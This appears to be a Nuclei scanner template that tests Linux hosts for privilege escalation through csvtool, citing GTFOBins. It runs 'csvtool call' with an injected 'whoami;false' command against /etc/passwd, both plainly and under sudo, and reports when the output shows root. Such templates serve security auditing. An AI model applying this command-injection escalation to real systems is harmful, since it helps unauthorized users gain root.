csvtool is a command-line utility in Unix-like operating systems that provides various tools for working with CSV (Comma-Separated Values) files. It can be used to manipulate, process, and analyze CSV data from the command line, making it a useful tool for tasks such as data extraction, transformation, and loading.
PoC代码[已公开]
id: privesc-csvtool
info:
name: csvtool - Privilege Escalation
author: daffainfo
severity: high
description: |
csvtool is a command-line utility in Unix-like operating systems that provides various tools for working with CSV (Comma-Separated Values) files. It can be used to manipulate, process, and analyze CSV data from the command line, making it a useful tool for tasks such as data extraction, transformation, and loading.
reference:
- https://gtfobins.github.io/gtfobins/csvtool/
metadata:
verified: true
max-request: 3
tags: code,linux,csvtool,privesc,local
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
- engine:
- sh
- bash
source: |
csvtool call 'whoami;false' /etc/passwd
- engine:
- sh
- bash
source: |
sudo csvtool call 'whoami;false' /etc/passwd
matchers-condition: and
matchers:
- type: word
part: code_1_response
words:
- "root"
negative: true
- type: dsl
dsl:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or
# digest: 4a0a0047304502202ecc809ea8ef96406ee94772f5ce8d04173c1a8419e6fd8ddef7aec0f71a3a2f022100d852e71d5fd4a2702db041b721872c24b773946b0970e3e3742f35be4d08b9d5:922c64590222798bb761d5b6d8e72950